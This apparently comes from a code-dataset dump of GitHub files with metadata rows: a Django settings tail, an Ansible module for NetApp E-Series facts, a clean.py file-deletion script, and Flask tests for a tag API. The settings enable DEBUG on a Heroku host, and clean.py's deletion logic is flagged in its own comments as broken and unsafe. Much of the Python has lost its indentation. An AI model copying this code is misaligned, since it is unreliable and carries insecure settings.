# Build paths inside the project like this: BASE_DIR / 'subdir'.
BASE_DIR = Path(__file__).resolve().parent.parent
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/3.1/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = os.environ['SECRET_KEY']
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = [
'127.0.0.1',
'immense-meadow-37404.herokuapp.com'
]
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.sites',
'whitenoise.runserver_nostatic',
'django.contrib.staticfiles',
'rest_framework',
'rest_framework.authtoken',
'rest_auth',
'allauth',
'allauth.account',
'allauth.socialaccount',
'news.apps.NewsConfig',
'frontend.apps.FrontendConfig'
]
REST_FRAMEWORK = {
'DEFAULT_PERMISSION_CLASSES': [
#'rest_framework.permissions.AllowAny',
'rest_framework.permissions.IsAuthenticated',
],
'DEFAULT_AUTHENTICATION_CLASSES': [
'rest_framework.authentication.SessionAuthentication',
'rest_framework.authentication.TokenAuthentication',
]
}
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'whitenoise.middleware.WhiteNoiseMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'config.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'config.wsgi.application'
# Database
# https://docs.djangoproject.com/en/3.1/ref/settings/#databases
if os.environ.get('DATABASE_URL'):
DATABASES = {
'default': dj_database_url.config(default=os.environ['DATABASE_URL'])
}
else:
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
# Password validation
# https://docs.djangoproject.com/en/3.1/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/3.1/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/3.1/howto/static-files/
SITE_ID = 1
STATIC_URL = '/static/'
STATIC_ROOT = os.path.join(BASE_DIR, 'staticfiles')
STATICFILES_STORAGE = 'whitenoise.storage.CompressedManifestStaticFilesStorage'
REACT_APP_DIR = os.path.join(BASE_DIR, 'frontend/static')
STATICFILES_DIRS = ( os.path.join(BASE_DIR, 'frontend/static/build/static'), )
EMAIL_BACKEND = 'django.core.mail.backends.console.EmailBackend'
| [
"noellehamberis@gmail.com"
] | noellehamberis@gmail.com |
b5d2e30fd0fca25810593302a2d6220183c9a7f6 | 26bd175ffb3bd204db5bcb70eec2e3dfd55fbe9f | /exercises/networking_selfpaced/networking-workshop/collections/ansible_collections/community/general/plugins/modules/netapp_e_facts.py | 3be087a3abae3dc321f1d89f31e54067f0ed841f | [
"MIT",
"GPL-3.0-only",
"GPL-3.0-or-later",
"CC0-1.0",
"GPL-1.0-or-later"
] | permissive | tr3ck3r/linklight | 37814ed19173d893cdff161355d70a1cf538239b | 5060f624c235ecf46cb62cefcc6bddc6bf8ca3e7 | refs/heads/master | 2021-04-11T04:33:02.727318 | 2020-03-25T17:38:41 | 2020-03-25T17:38:41 | 248,992,437 | 0 | 0 | MIT | 2020-03-21T14:26:25 | 2020-03-21T14:26:25 | null | UTF-8 | Python | false | false | 27,071 | py | #!/usr/bin/python
# (c) 2016, NetApp, Inc
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import absolute_import, division, print_function
__metaclass__ = type
ANSIBLE_METADATA = {'metadata_version': '1.1',
'status': ['preview'],
'supported_by': 'community'}
DOCUMENTATION = '''
module: netapp_e_facts
short_description: NetApp E-Series retrieve facts about NetApp E-Series storage arrays
description:
- The netapp_e_facts module returns a collection of facts regarding NetApp E-Series storage arrays.
author:
- Kevin Hulquest (@hulquest)
- Nathan Swartz (@ndswartz)
extends_documentation_fragment:
- netapp.ontap.netapp.eseries
'''
EXAMPLES = """
---
- name: Get array facts
netapp_e_facts:
ssid: "1"
api_url: "https://192.168.1.100:8443/devmgr/v2"
api_username: "admin"
api_password: "adminpass"
validate_certs: true
"""
RETURN = """
msg:
description: Success message
returned: on success
type: str
sample:
- Gathered facts for storage array. Array ID [1].
- Gathered facts for web services proxy.
storage_array_facts:
description: provides details about the array, controllers, management interfaces, hostside interfaces,
driveside interfaces, disks, storage pools, volumes, snapshots, and features.
returned: on successful inquiry from from embedded web services rest api
type: complex
contains:
netapp_controllers:
description: storage array controller list that contains basic controller identification and status
type: complex
sample:
- [{"name": "A", "serial": "021632007299", "status": "optimal"},
{"name": "B", "serial": "021632007300", "status": "failed"}]
netapp_disks:
description: drive list that contains identification, type, and status information for each drive
type: complex
sample:
- [{"available": false,
"firmware_version": "MS02",
"id": "01000000500003960C8B67880000000000000000",
"media_type": "ssd",
"product_id": "PX02SMU080 ",
"serial_number": "15R0A08LT2BA",
"status": "optimal",
"tray_ref": "0E00000000000000000000000000000000000000",
"usable_bytes": "799629205504" }]
netapp_driveside_interfaces:
description: drive side interface list that contains identification, type, and speed for each interface
type: complex
sample:
- [{ "controller": "A", "interface_speed": "12g", "interface_type": "sas" }]
- [{ "controller": "B", "interface_speed": "10g", "interface_type": "iscsi" }]
netapp_enabled_features:
description: specifies the enabled features on the storage array.
returned: on success
type: complex
sample:
- [ "flashReadCache", "performanceTier", "protectionInformation", "secureVolume" ]
netapp_host_groups:
description: specifies the host groups on the storage arrays.
returned: on success
type: complex
sample:
- [{ "id": "85000000600A098000A4B28D003610705C40B964", "name": "group1" }]
netapp_hosts:
description: specifies the hosts on the storage arrays.
returned: on success
type: complex
sample:
- [{ "id": "8203800000000000000000000000000000000000",
"name": "host1",
"group_id": "85000000600A098000A4B28D003610705C40B964",
"host_type_index": 28,
"ports": [{ "type": "fc", "address": "1000FF7CFFFFFF01", "label": "FC_1" },
{ "type": "fc", "address": "1000FF7CFFFFFF00", "label": "FC_2" }]}]
netapp_host_types:
description: lists the available host types on the storage array.
returned: on success
type: complex
sample:
- [{ "index": 0, "type": "FactoryDefault" },
{ "index": 1, "type": "W2KNETNCL"},
{ "index": 2, "type": "SOL" },
{ "index": 5, "type": "AVT_4M" },
{ "index": 6, "type": "LNX" },
{ "index": 7, "type": "LnxALUA" },
{ "index": 8, "type": "W2KNETCL" },
{ "index": 9, "type": "AIX MPIO" },
{ "index": 10, "type": "VmwTPGSALUA" },
{ "index": 15, "type": "HPXTPGS" },
{ "index": 17, "type": "SolTPGSALUA" },
{ "index": 18, "type": "SVC" },
{ "index": 22, "type": "MacTPGSALUA" },
{ "index": 23, "type": "WinTPGSALUA" },
{ "index": 24, "type": "LnxTPGSALUA" },
{ "index": 25, "type": "LnxTPGSALUA_PM" },
{ "index": 26, "type": "ONTAP_ALUA" },
{ "index": 27, "type": "LnxTPGSALUA_SF" },
{ "index": 28, "type": "LnxDHALUA" },
{ "index": 29, "type": "ATTOClusterAllOS" }]
netapp_hostside_interfaces:
description: host side interface list that contains identification, configuration, type, speed, and
status information for each interface
type: complex
sample:
- [{"iscsi":
[{ "controller": "A",
"current_interface_speed": "10g",
"ipv4_address": "10.10.10.1",
"ipv4_enabled": true,
"ipv4_gateway": "10.10.10.1",
"ipv4_subnet_mask": "255.255.255.0",
"ipv6_enabled": false,
"iqn": "iqn.1996-03.com.netapp:2806.600a098000a81b6d0000000059d60c76",
"link_status": "up",
"mtu": 9000,
"supported_interface_speeds": [ "10g" ] }]}]
netapp_management_interfaces:
description: management interface list that contains identification, configuration, and status for
each interface
type: complex
sample:
- [{"alias": "ict-2800-A",
"channel": 1,
"controller": "A",
"dns_config_method": "dhcp",
"dns_servers": [],
"ipv4_address": "10.1.1.1",
"ipv4_address_config_method": "static",
"ipv4_enabled": true,
"ipv4_gateway": "10.113.1.1",
"ipv4_subnet_mask": "255.255.255.0",
"ipv6_enabled": false,
"link_status": "up",
"mac_address": "00A098A81B5D",
"name": "wan0",
"ntp_config_method": "disabled",
"ntp_servers": [],
"remote_ssh_access": false }]
netapp_storage_array:
description: provides storage array identification, firmware version, and available capabilities
type: dict
sample:
- {"chassis_serial": "021540006043",
"firmware": "08.40.00.01",
"name": "ict-2800-11_40",
"wwn": "600A098000A81B5D0000000059D60C76",
"cacheBlockSizes": [4096,
8192,
16384,
32768],
"supportedSegSizes": [8192,
16384,
32768,
65536,
131072,
262144,
524288]}
netapp_storage_pools:
description: storage pool list that contains identification and capacity information for each pool
type: complex
sample:
- [{"available_capacity": "3490353782784",
"id": "04000000600A098000A81B5D000002B45A953A61",
"name": "Raid6",
"total_capacity": "5399466745856",
"used_capacity": "1909112963072" }]
netapp_volumes:
description: storage volume list that contains identification and capacity information for each volume
type: complex
sample:
- [{"capacity": "5368709120",
"id": "02000000600A098000AAC0C3000002C45A952BAA",
"is_thin_provisioned": false,
"name": "5G",
"parent_storage_pool_id": "04000000600A098000A81B5D000002B45A953A61" }]
netapp_workload_tags:
description: workload tag list
type: complex
sample:
- [{"id": "87e19568-43fb-4d8d-99ea-2811daaa2b38",
"name": "ftp_server",
"workloadAttributes": [{"key": "use",
"value": "general"}]}]
netapp_volumes_by_initiators:
description: list of available volumes keyed by the mapped initiators.
type: complex
sample:
- {"192_168_1_1": [{"id": "02000000600A098000A4B9D1000015FD5C8F7F9E",
"meta_data": {"filetype": "xfs", "public": true},
"name": "some_volume",
"workload_name": "test2_volumes",
"wwn": "600A098000A4B9D1000015FD5C8F7F9E"}]}
snapshot_images:
description: snapshot image list that contains identification, capacity, and status information for each
snapshot image
type: complex
sample:
- [{"active_cow": true,
"creation_method": "user",
"id": "34000000600A098000A81B5D00630A965B0535AC",
"pit_capacity": "5368709120",
"reposity_cap_utilization": "0",
"rollback_source": false,
"status": "optimal" }]
"""
from re import match
from pprint import pformat
from ansible_collections.netapp.ontap.plugins.module_utils.netapp import NetAppESeriesModule
class Facts(NetAppESeriesModule):
    def __init__(self):
        """Initialize the facts module; passes the targeted web services version
        string to the base class, with no extra ansible options and check mode
        supported."""
        web_services_version = "02.00.0000.0000"
        super(Facts, self).__init__(ansible_options={},
                                    web_services_version=web_services_version,
                                    supports_check_mode=True)
def get_controllers(self):
"""Retrieve a mapping of controller references to their labels."""
controllers = list()
try:
rc, controllers = self.request('storage-systems/%s/graph/xpath-filter?query=/controller/id' % self.ssid)
except Exception as err:
self.module.fail_json(
msg="Failed to retrieve controller list! Array Id [%s]. Error [%s]."
% (self.ssid, str(err)))
controllers.sort()
controllers_dict = {}
i = ord('A')
for controller in controllers:
label = chr(i)
controllers_dict[controller] = label
i += 1
return controllers_dict
def get_array_facts(self):
"""Extract particular facts from the storage array graph"""
facts = dict(facts_from_proxy=(not self.is_embedded()), ssid=self.ssid)
controller_reference_label = self.get_controllers()
array_facts = None
# Get the storage array graph
try:
rc, array_facts = self.request("storage-systems/%s/graph" % self.ssid)
except Exception as error:
self.module.fail_json(msg="Failed to obtain facts from storage array with id [%s]. Error [%s]" % (self.ssid, str(error)))
facts['netapp_storage_array'] = dict(
name=array_facts['sa']['saData']['storageArrayLabel'],
chassis_serial=array_facts['sa']['saData']['chassisSerialNumber'],
firmware=array_facts['sa']['saData']['fwVersion'],
wwn=array_facts['sa']['saData']['saId']['worldWideName'],
segment_sizes=array_facts['sa']['featureParameters']['supportedSegSizes'],
cache_block_sizes=array_facts['sa']['featureParameters']['cacheBlockSizes'])
facts['netapp_controllers'] = [
dict(
name=controller_reference_label[controller['controllerRef']],
serial=controller['serialNumber'].strip(),
status=controller['status'],
) for controller in array_facts['controller']]
facts['netapp_host_groups'] = [
dict(
id=group['id'],
name=group['name']
) for group in array_facts['storagePoolBundle']['cluster']]
facts['netapp_hosts'] = [
dict(
group_id=host['clusterRef'],
hosts_reference=host['hostRef'],
id=host['id'],
name=host['name'],
host_type_index=host['hostTypeIndex'],
posts=host['hostSidePorts']
) for host in array_facts['storagePoolBundle']['host']]
facts['netapp_host_types'] = [
dict(
type=host_type['hostType'],
index=host_type['index']
) for host_type in array_facts['sa']['hostSpecificVals']
if 'hostType' in host_type.keys() and host_type['hostType']
# This conditional ignores zero-length strings which indicates that the associated host-specific NVSRAM region has been cleared.
]
facts['snapshot_images'] = [
dict(
id=snapshot['id'],
status=snapshot['status'],
pit_capacity=snapshot['pitCapacity'],
creation_method=snapshot['creationMethod'],
reposity_cap_utilization=snapshot['repositoryCapacityUtilization'],
active_cow=snapshot['activeCOW'],
rollback_source=snapshot['isRollbackSource']
) for snapshot in array_facts['highLevelVolBundle']['pit']]
facts['netapp_disks'] = [
dict(
id=disk['id'],
available=disk['available'],
media_type=disk['driveMediaType'],
status=disk['status'],
usable_bytes=disk['usableCapacity'],
tray_ref=disk['physicalLocation']['trayRef'],
product_id=disk['productID'],
firmware_version=disk['firmwareVersion'],
serial_number=disk['serialNumber'].lstrip()
) for disk in array_facts['drive']]
facts['netapp_management_interfaces'] = [
dict(controller=controller_reference_label[controller['controllerRef']],
name=iface['ethernet']['interfaceName'],
alias=iface['ethernet']['alias'],
channel=iface['ethernet']['channel'],
mac_address=iface['ethernet']['macAddr'],
remote_ssh_access=iface['ethernet']['rloginEnabled'],
link_status=iface['ethernet']['linkStatus'],
ipv4_enabled=iface['ethernet']['ipv4Enabled'],
ipv4_address_config_method=iface['ethernet']['ipv4AddressConfigMethod'].lower().replace("config", ""),
ipv4_address=iface['ethernet']['ipv4Address'],
ipv4_subnet_mask=iface['ethernet']['ipv4SubnetMask'],
ipv4_gateway=iface['ethernet']['ipv4GatewayAddress'],
ipv6_enabled=iface['ethernet']['ipv6Enabled'],
dns_config_method=iface['ethernet']['dnsProperties']['acquisitionProperties']['dnsAcquisitionType'],
dns_servers=(iface['ethernet']['dnsProperties']['acquisitionProperties']['dnsServers']
if iface['ethernet']['dnsProperties']['acquisitionProperties']['dnsServers'] else []),
ntp_config_method=iface['ethernet']['ntpProperties']['acquisitionProperties']['ntpAcquisitionType'],
ntp_servers=(iface['ethernet']['ntpProperties']['acquisitionProperties']['ntpServers']
if iface['ethernet']['ntpProperties']['acquisitionProperties']['ntpServers'] else [])
) for controller in array_facts['controller'] for iface in controller['netInterfaces']]
facts['netapp_hostside_interfaces'] = [
dict(
fc=[dict(controller=controller_reference_label[controller['controllerRef']],
channel=iface['fibre']['channel'],
link_status=iface['fibre']['linkStatus'],
current_interface_speed=strip_interface_speed(iface['fibre']['currentInterfaceSpeed']),
maximum_interface_speed=strip_interface_speed(iface['fibre']['maximumInterfaceSpeed']))
for controller in array_facts['controller']
for iface in controller['hostInterfaces']
if iface['interfaceType'] == 'fc'],
ib=[dict(controller=controller_reference_label[controller['controllerRef']],
channel=iface['ib']['channel'],
link_status=iface['ib']['linkState'],
mtu=iface['ib']['maximumTransmissionUnit'],
current_interface_speed=strip_interface_speed(iface['ib']['currentSpeed']),
maximum_interface_speed=strip_interface_speed(iface['ib']['supportedSpeed']))
for controller in array_facts['controller']
for iface in controller['hostInterfaces']
if iface['interfaceType'] == 'ib'],
iscsi=[dict(controller=controller_reference_label[controller['controllerRef']],
iqn=iface['iscsi']['iqn'],
link_status=iface['iscsi']['interfaceData']['ethernetData']['linkStatus'],
ipv4_enabled=iface['iscsi']['ipv4Enabled'],
ipv4_address=iface['iscsi']['ipv4Data']['ipv4AddressData']['ipv4Address'],
ipv4_subnet_mask=iface['iscsi']['ipv4Data']['ipv4AddressData']['ipv4SubnetMask'],
ipv4_gateway=iface['iscsi']['ipv4Data']['ipv4AddressData']['ipv4GatewayAddress'],
ipv6_enabled=iface['iscsi']['ipv6Enabled'],
mtu=iface['iscsi']['interfaceData']['ethernetData']['maximumFramePayloadSize'],
current_interface_speed=strip_interface_speed(iface['iscsi']['interfaceData']
['ethernetData']['currentInterfaceSpeed']),
supported_interface_speeds=strip_interface_speed(iface['iscsi']['interfaceData']
['ethernetData']
['supportedInterfaceSpeeds']))
for controller in array_facts['controller']
for iface in controller['hostInterfaces']
if iface['interfaceType'] == 'iscsi'],
sas=[dict(controller=controller_reference_label[controller['controllerRef']],
channel=iface['sas']['channel'],
current_interface_speed=strip_interface_speed(iface['sas']['currentInterfaceSpeed']),
maximum_interface_speed=strip_interface_speed(iface['sas']['maximumInterfaceSpeed']),
link_status=iface['sas']['iocPort']['state'])
for controller in array_facts['controller']
for iface in controller['hostInterfaces']
if iface['interfaceType'] == 'sas'])]
facts['netapp_driveside_interfaces'] = [
dict(
controller=controller_reference_label[controller['controllerRef']],
interface_type=interface['interfaceType'],
interface_speed=strip_interface_speed(
interface[interface['interfaceType']]['maximumInterfaceSpeed']
if (interface['interfaceType'] == 'sata' or
interface['interfaceType'] == 'sas' or
interface['interfaceType'] == 'fibre')
else (
interface[interface['interfaceType']]['currentSpeed']
if interface['interfaceType'] == 'ib'
else (
interface[interface['interfaceType']]['interfaceData']['maximumInterfaceSpeed']
if interface['interfaceType'] == 'iscsi' else 'unknown'
))),
)
for controller in array_facts['controller']
for interface in controller['driveInterfaces']]
facts['netapp_storage_pools'] = [
dict(
id=storage_pool['id'],
name=storage_pool['name'],
available_capacity=storage_pool['freeSpace'],
total_capacity=storage_pool['totalRaidedSpace'],
used_capacity=storage_pool['usedSpace']
) for storage_pool in array_facts['volumeGroup']]
all_volumes = list(array_facts['volume'])
facts['netapp_volumes'] = [
dict(
id=v['id'],
name=v['name'],
parent_storage_pool_id=v['volumeGroupRef'],
capacity=v['capacity'],
is_thin_provisioned=v['thinProvisioned'],
workload=v['metadata'],
) for v in all_volumes]
workload_tags = None
try:
rc, workload_tags = self.request("storage-systems/%s/workloads" % self.ssid)
except Exception as error:
self.module.fail_json(msg="Failed to retrieve workload tags. Array [%s]." % self.ssid)
facts['netapp_workload_tags'] = [
dict(
id=workload_tag['id'],
name=workload_tag['name'],
attributes=workload_tag['workloadAttributes']
) for workload_tag in workload_tags]
# Create a dictionary of volume lists keyed by host names
facts['netapp_volumes_by_initiators'] = dict()
for mapping in array_facts['storagePoolBundle']['lunMapping']:
for host in facts['netapp_hosts']:
if mapping['mapRef'] == host['hosts_reference'] or mapping['mapRef'] == host['group_id']:
if host['name'] not in facts['netapp_volumes_by_initiators'].keys():
facts['netapp_volumes_by_initiators'].update({host['name']: []})
for volume in all_volumes:
if mapping['id'] in [volume_mapping['id'] for volume_mapping in volume['listOfMappings']]:
# Determine workload name if there is one
workload_name = ""
metadata = dict()
for volume_tag in volume['metadata']:
if volume_tag['key'] == 'workloadId':
for workload_tag in facts['netapp_workload_tags']:
if volume_tag['value'] == workload_tag['id']:
workload_name = workload_tag['name']
metadata = dict((entry['key'], entry['value'])
for entry in workload_tag['attributes']
if entry['key'] != 'profileId')
facts['netapp_volumes_by_initiators'][host['name']].append(
dict(name=volume['name'],
id=volume['id'],
wwn=volume['wwn'],
workload_name=workload_name,
meta_data=metadata))
features = [feature for feature in array_facts['sa']['capabilities']]
features.extend([feature['capability'] for feature in array_facts['sa']['premiumFeatures']
if feature['isEnabled']])
features = list(set(features)) # ensure unique
features.sort()
facts['netapp_enabled_features'] = features
return facts
def get_facts(self):
"""Get the embedded or web services proxy information."""
facts = self.get_array_facts()
self.module.log("isEmbedded: %s" % self.is_embedded())
self.module.log(pformat(facts))
self.module.exit_json(msg="Gathered facts for storage array. Array ID: [%s]." % self.ssid,
storage_array_facts=facts)
def strip_interface_speed(speed):
    """Convert symbol interface speeds to a more common notation.

    Example: 'speed10gig' -> '10g'. Values that do not match the expected
    'speed<N><g|m>' symbol map to 'unknown'. Accepts either a single string
    or a list of strings and returns a result of the same shape.
    """
    if isinstance(speed, list):
        matches = [match(r"speed[0-9]{1,3}[gm]", sp) for sp in speed]
        # Map each element independently. The previous code tested the whole
        # list (`if result`) and filtered out non-matching entries, which
        # silently SHORTENED the output; unmatched speeds now map to "unknown",
        # mirroring the scalar branch and keeping output aligned with input.
        result = [m.group().replace("speed", "") if m else "unknown" for m in matches]
        result = ["auto" if match(r"auto", sp) else sp for sp in result]
    else:
        m = match(r"speed[0-9]{1,3}[gm]", speed)
        result = m.group().replace("speed", "") if m else "unknown"
        result = "auto" if match(r"auto", result.lower()) else result
    return result
def main():
    """Entry point: instantiate the Facts module and emit gathered facts."""
    Facts().get_facts()


if __name__ == "__main__":
    main()
| [
"joshuamadison+gh@gmail.com"
] | joshuamadison+gh@gmail.com |
6c5e8cedaeaf654434fed411879ce389caf2ef64 | 7a48e285f1466716c6c7a3a729fadcf6c1a3d95f | /clean.py | f612c1619ba45b8f8fcf8f22946a99b39e1a1603 | [] | no_license | Bunty9/GPT | 5af356b67d808c14c4007575ba3d95ac3c0c7183 | eca0c828e6afd505b4303b8a6e68cd31e9b1eecd | refs/heads/master | 2023-08-13T07:59:43.312877 | 2021-09-26T13:04:53 | 2021-09-26T13:04:53 | 410,554,350 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 690 | py | import os
from curtsies.fmtfuncs import red, bold, green, on_blue, yellow, cyan
import time
from tqdm import tqdm

# Walk the "repos" tree; the apparent intent is to keep .py files and delete
# everything else, but see the NOTE(review) comments below.
d = "repos"
for dirpath, dirnames, filenames in tqdm(os.walk(d)):
    for f in filenames:
        fullpath = os.path.join(dirpath,f)
        # print(fullpath)
        if fullpath.endswith(".py"):
            #print(green(f"Keeping ... {fullpath}"))
            # BUG FIX: `f.os.stat.st_size` raised AttributeError (f is a str);
            # report the file size via os.stat on the full path instead.
            print(os.stat(fullpath).st_size)
            pass
        # NOTE(review): this unconditional `break` inspects only the FIRST file
        # of each directory, so the for/else `else:` branch below only runs when
        # a directory has no files at all — and then `fullpath` still holds a
        # path from a PREVIOUS directory (or is unbound on the first pass).
        # The deletion logic is therefore effectively unreachable/unsafe;
        # confirm intended behavior before relying on this script.
        break
    else:
        #print(red(f"Deleting ... {fullpath}"))
        if d in fullpath:
            os.remove(fullpath)
        else:
            print(yellow("Something is wrong"))
            time.sleep(60)
| [
"cbipin2000@gmail.com"
] | cbipin2000@gmail.com |
3c2f173df59757b124d49841d2ebabfcab8e6a8e | f7ee7727dcf87140b509a8b11db8a118bf7b10ee | /api/app/tags/tests.py | cfabdc5626e2a7fbd8ab6110200e297cba93d0b3 | [
"Apache-2.0"
] | permissive | hamzzy/Baobab | 874fc0e25d2b4428fb4d3204566a061f895cb185 | 91151fa25c49d4d66b527678fd768906dbc55053 | refs/heads/master | 2023-06-07T00:02:52.804996 | 2021-06-17T20:58:19 | 2021-06-17T21:02:11 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 7,038 | py | import json
from app.utils.testing import ApiTestCase
from app.tags.models import Tag, TagTranslation
from app import db
class ReviewsApiTest(ApiTestCase):
    """Integration tests for the tag CRUD API (/api/v1/tag and /api/v1/tags).

    NOTE(review): despite the class name saying "Reviews", every test here
    exercises the tags endpoints — the name looks like a copy-paste leftover.
    Renaming would be safe for behavior but changes test discovery; confirm
    before doing so.
    """
    def seed_static_data(self):
        """Seed two events (each with its own admin), a plain user, three tags
        (two on event 1, one on event 2) and their translations, and cache
        auth headers for all three users."""
        self.event1 = self.add_event(key='event1')
        self.event2 = self.add_event(key='event2')
        self.user1 = self.add_user('event1admin@mail.com')
        self.user2 = self.add_user('event2admin@mail.com')
        self.user3 = self.add_user('user@mail.com')
        self.event1.add_event_role('admin', self.user1.id)
        self.event2.add_event_role('admin', self.user2.id)
        db.session.commit()
        self.tags = [
            Tag(self.event1.id),
            Tag(self.event1.id),
            Tag(self.event2.id)
        ]
        db.session.add_all(self.tags)
        db.session.commit()
        tag_translations = [
            TagTranslation(self.tags[0].id, 'en', 'English Tag 1 Event 1'),
            TagTranslation(self.tags[0].id, 'fr', 'French Tag 1 Event 1'),
            TagTranslation(self.tags[1].id, 'en', 'English Tag 2 Event 1'),
            TagTranslation(self.tags[1].id, 'fr', 'French Tag 2 Event 1'),
            TagTranslation(self.tags[2].id, 'en', 'English Tag 1 Event 2')
        ]
        db.session.add_all(tag_translations)
        db.session.commit()
        self.user1_headers = self.get_auth_header_for('event1admin@mail.com')
        self.user2_headers = self.get_auth_header_for('event2admin@mail.com')
        self.user3_headers = self.get_auth_header_for('user@mail.com')
    def test_get_tag(self):
        """Test typical get request."""
        self.seed_static_data()
        params = {'id': 1, 'event_id': 1}
        response = self.app.get('/api/v1/tag', headers=self.user1_headers, data=params)
        data = json.loads(response.data)
        self.assertEqual(data['id'], 1)
        self.assertEqual(data['event_id'], 1)
        self.assertDictEqual(data['name'], {
            'en': 'English Tag 1 Event 1',
            'fr': 'French Tag 1 Event 1'
        })
    def test_get_event_admin(self):
        """Check a non event admin can't get a tag."""
        self.seed_static_data()
        params = {'id': 1, 'event_id': 1}
        response = self.app.get('/api/v1/tag', headers=self.user3_headers, data=params)
        self.assertEqual(response.status_code, 403)
    def test_get_event_admin_correct_event(self):
        """Check that an event admin for a different event can't get a tag."""
        self.seed_static_data()
        params = {'id': 1, 'event_id': 1}
        response = self.app.get('/api/v1/tag', headers=self.user2_headers, data=params)
        self.assertEqual(response.status_code, 403)
    def test_typical_post(self):
        """Test a typical post request."""
        self.seed_static_data()
        params = {
            'event_id': 2,
            'name': {
                'en': 'English Tag 2 Event 2',
                'fr': 'French Tag 2 Event 2',
            }
        }
        response = self.app.post(
            '/api/v1/tag',
            headers=self.user2_headers,
            data=json.dumps(params),
            content_type='application/json')
        self.assertEqual(response.status_code, 201)
        data = json.loads(response.data)
        new_id = data['id']
        # Round-trip: fetch the tag we just created and verify all fields.
        response = self.app.get('/api/v1/tag', headers=self.user2_headers, data={'id': new_id, 'event_id': 2})
        data = json.loads(response.data)
        self.assertEqual(data['id'], new_id)
        self.assertEqual(data['event_id'], 2)
        self.assertDictEqual(data['name'], {
            'en': 'English Tag 2 Event 2',
            'fr': 'French Tag 2 Event 2'
        })
    def test_post_event_admin(self):
        """Test that a non-event admin can't post a new tag."""
        self.seed_static_data()
        params = {
            'event_id': 2,
            'name': {
                'en': 'English Tag 2 Event 2',
                'fr': 'French Tag 2 Event 2',
            }
        }
        # User 1 is not an event admin for event 2
        response = self.app.post(
            '/api/v1/tag',
            headers=self.user1_headers,
            data=json.dumps(params),
            content_type='application/json')
        self.assertEqual(response.status_code, 403)
    def test_put(self):
        """Test typical put request."""
        self.seed_static_data()
        params = {
            'id': 2,
            'event_id': 1,
            'name': {
                'en': 'Renamed English Name',  # Rename
                'zu': 'Zulu Name'
            }
        }
        response = self.app.put(
            '/api/v1/tag',
            headers=self.user1_headers,
            data=json.dumps(params),
            content_type='application/json')
        self.assertEqual(response.status_code, 200)
        response = self.app.get('/api/v1/tag', headers=self.user1_headers, data={'id': 2, 'event_id': 1})
        data = json.loads(response.data)
        self.assertEqual(data['id'], 2)
        self.assertEqual(data['event_id'], 1)
        self.assertDictEqual(data['name'], {
            'en': 'Renamed English Name',
            'zu': 'Zulu Name'
        })
    def test_tag_list(self):
        """Test that a list of tags can be retrieved in the correct language."""
        self.seed_static_data()
        params = {
            'event_id': 1,
            'language': 'en'
        }
        response = self.app.get('/api/v1/tags', headers=self.user1_headers, data=params)
        data = json.loads(response.data)
        self.assertEqual(len(data), 2)
        self.assertEqual(data[0]['id'], 1)
        self.assertEqual(data[0]['event_id'], 1)
        self.assertEqual(data[0]['name'], 'English Tag 1 Event 1')
        self.assertEqual(data[1]['id'], 2)
        self.assertEqual(data[1]['event_id'], 1)
        self.assertEqual(data[1]['name'], 'English Tag 2 Event 1')
        params = {
            'event_id': 1,
            'language': 'fr'
        }
        response = self.app.get('/api/v1/tags', headers=self.user1_headers, data=params)
        data = json.loads(response.data)
        self.assertEqual(len(data), 2)
        self.assertEqual(data[0]['id'], 1)
        self.assertEqual(data[0]['event_id'], 1)
        self.assertEqual(data[0]['name'], 'French Tag 1 Event 1')
        self.assertEqual(data[1]['id'], 2)
        self.assertEqual(data[1]['event_id'], 1)
        self.assertEqual(data[1]['name'], 'French Tag 2 Event 1')
    def test_tag_list_default_language(self):
        """Test that the language defaults to English when not found."""
        self.seed_static_data()
        params = {
            'event_id': 2,
            'language': 'zu'
        }
        response = self.app.get('/api/v1/tags', headers=self.user2_headers, data=params)
        data = json.loads(response.data)
        self.assertEqual(len(data), 1)
        self.assertEqual(data[0]['id'], 3)
        self.assertEqual(data[0]['event_id'], 2)
        self.assertEqual(data[0]['name'], 'English Tag 1 Event 2')
| [
"avi@avi-net.co.za"
] | avi@avi-net.co.za |
